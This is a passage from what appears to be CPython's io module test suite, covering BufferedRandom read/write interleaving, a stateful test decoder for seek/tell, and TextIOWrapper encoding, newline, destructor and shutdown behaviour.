def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
# Overwriting should rewind the raw stream if it needs so
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
# You can't construct a BufferedRandom over a non-seekable stream.
test_unseekable = None
class CBufferedRandomTest(BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedRandom"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are space-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == ord('.'):
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=cls)
# Register the previous decoder for testing.
# Disabled by default, tests will enable it.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
t.__init__(b, encoding="latin-1", newline="\r\n")
self.assertEqual(t.encoding, "latin-1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf-8", line_buffering=True)
self.assertEqual(t.encoding, "utf-8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_non_text_encoding_codecs_are_rejected(self):
# Ensure the constructor complains if passed a codec that isn't
# marked as a text encoding
# http://bugs.python.org/issue20404
r = self.BytesIO()
b = self.BufferedWriter(r)
with self.assertRaisesRegex(LookupError, "is not a text encoding"):
self.TextIOWrapper(b, encoding="hex")
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b)
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertEqual(repr(t),
"<%s.TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
t.mode = "r"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname)
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
def test_default_encoding(self):
old_environ = dict(os.environ)
try:
# try to get a user preferred encoding different than the current
# locale encoding to check that TextIOWrapper() uses the current
# locale encoding and not the user preferred encoding
for key in ('LC_ALL', 'LANG', 'LC_CTYPE'):
if key in os.environ:
del os.environ[key]
current_locale_encoding = locale.getpreferredencoding(False)
b = self.BytesIO()
t = self.TextIOWrapper(b)
self.assertEqual(t.encoding, current_locale_encoding)
finally:
os.environ.clear()
os.environ.update(old_environ)
@support.cpython_only
def test_device_encoding(self):
# Issue 15989
import _testcapi
b = self.BytesIO()
b.fileno = lambda: _testcapi.INT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
b.fileno = lambda: _testcapi.UINT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
def test_encoding(self):
# Check the encoding attribute is always set, and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf-8")
self.assertEqual(t.encoding, "utf-8")
t = self.TextIOWrapper(b)
self.assertTrue(t.encoding is not None)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(keepends=True)),
("", testdata.decode("ascii").splitlines(keepends=True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.TextIOWrapper(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception OSError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
# Systematic tests of the text I/O API
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in "ascii", "latin-1", "utf-8" :# , "utf-16-be", "utf-16-le":
f = self.open(support.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(support.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
f = self.open(support.TESTFN, "w+", encoding="utf-8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, "\xff\n")
self.assertRaises(OSError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
with self.open(support.TESTFN, "wb") as f:
f.write(line*2)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
s = f.read(prefix_size)
self.assertEqual(s, str(prefix, "ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
with self.open(support.TESTFN, "wb") as f:
f.write(data)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
#Test seek/tell using the StatefulIncrementalDecoder.
# Make test faster by doing smaller seeks
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(support.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(support.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(support.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check if the BOM is written only once (see issue1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable())
self.assertRaises(OSError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"))
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128.
def test_read_by_chunk(self):
# make sure "\r\n" straddles 128 char boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_writelines(self):
l = ['ab', 'cd', 'ef']
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
l = UserList(['ab', 'cd', 'ef'])
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
txt = self.TextIOWrapper(self.BytesIO())
self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
self.assertRaises(TypeError, txt.writelines, None)
self.assertRaises(TypeError, txt.writelines, b'abc')
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
# Same test, but when seeking manually
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_errors_property(self):
with self.open(support.TESTFN, "w") as f:
self.assertEqual(f.errors, "strict")
with self.open(support.TESTFN, "w", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@support.no_tracing
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(support.TESTFN, "w", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=lambda n=x: run(n))
for x in range(20)]
for t in threads:
t.start()
time.sleep(0.02)
event.set()
for t in threads:
t.join()
with self.open(support.TESTFN) as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
def bad_flush():
raise OSError()
txt.flush = bad_flush
self.assertRaises(OSError, txt.close) # exception not swallowed
self.assertTrue(txt.closed)
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_unseekable(self):
txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata))
self.assertRaises(self.UnsupportedOperation, txt.tell)
self.assertRaises(self.UnsupportedOperation, txt.seek, 0)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises(AttributeError):
txt.buffer = buf
def test_rawio(self):
# Issue #12591: TextIOWrapper must work with raw I/O objects, so
# that subprocess.Popen() can have the required unbuffered
# semantics with universal_newlines=True.
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
# Reads
self.assertEqual(txt.read(4), 'abcd')
self.assertEqual(txt.readline(), 'efghi\n')
self.assertEqual(list(txt), ['jkl\n', 'opq\n'])
def test_rawio_write_through(self):
# Issue #12591: with write_through=True, writes don't need a flush
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n',
write_through=True)
txt.write('1')
txt.write('23\n4')
txt.write('5')
self.assertEqual(b''.join(raw._write_stack), b'123\n45')
def test_read_nonbytes(self):
# Issue #17106
# Crash when underlying read() returns non-bytes
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read, 1)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.readline)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read)
def test_illegal_decoder(self):
# Issue #17106
# Bypass the early encoding check added in issue 20404
def _make_illegal_wrapper():
quopri = codecs.lookup("quopri")
quopri._is_text_encoding = True
try:
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'),
newline='\n', encoding="quopri")
finally:
quopri._is_text_encoding = False
return t
# Crash when decoder returns non-string
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read, 1)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.readline)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read)
def _check_create_at_shutdown(self, **kwargs):
# Issue #20037: creating a TextIOWrapper at shutdown
# shouldn't crash the interpreter.
iomod = self.io.__name__
code = """if 1:
import codecs
import {iomod} as io
# Avoid looking up codecs at shutdown
codecs.lookup('utf-8')
class C:
def __init__(self):
self.buf = io.BytesIO()
def __del__(self):
io.TextIOWrapper(self.buf, **{kwargs})
print("ok")
c = C()
""".format(iomod=iomod, kwargs=kwargs)
return assert_python_ok("-c", code)
def test_create_at_shutdown_without_encoding(self):
rc, out, err = self._check_create_at_shutdown()
if err:
# Can error out with a RuntimeError if the module state
# isn't found.
self.assertIn(self.shutdown_error, err.decode())
else:
self.assertEqual("ok", out.decode().strip())
def test_create_at_shutdown_with_encoding(self):
rc, out, err = self._check_create_at_shutdown(encoding='utf-8',
errors='strict')
self.assertFalse(err)
self.assertEqual("ok", out.decode().strip())
class CTextIOWrapperTest(TextIOWrapperTest):
io = io
shutdown_error = "RuntimeError: could not find io module state"
def test_initialization(self):
